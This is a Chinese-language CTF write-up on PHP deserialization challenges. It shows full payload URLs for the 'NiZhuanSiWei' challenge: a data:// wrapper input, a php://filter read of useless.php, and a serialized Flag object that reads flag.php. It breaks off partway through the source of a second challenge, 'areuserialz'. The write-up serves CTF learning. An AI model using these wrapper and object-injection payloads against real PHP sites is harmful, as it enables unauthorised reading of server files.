反序列化CTF题总结
buu NiZhuanSiWei
主页是一段php代码,审计:
有file_get_content(),可以利用伪协议写入‘welcome to the zjctf '过判断;
同时看到提示有useless.php ,可以利用include()读一下文件
构造payload:
?text=data:text/plain,welcome%20to%20the%20zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php
得到base64源码:
解码审计:
<?php
class Flag{
//flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
?>
构造序列化:
$a=new Flag();
$a->file = 'flag.php' ;
echo serialize($a);
得到最终payload:
?text=data:text/plain,welcome%20to%20the%20zjctf&file=useless.php&password=O:4:“Flag”:1:{s:4:“file”;s:8:“flag.php”;}
结果在源码里
areuserialz
题目上来给源码,审:
<?php
include("flag.php");
highlight_file(__FILE__);
class FileHandler {
protected $op;
protected $filename;
protected $content;
function __construct() {
$op = "1"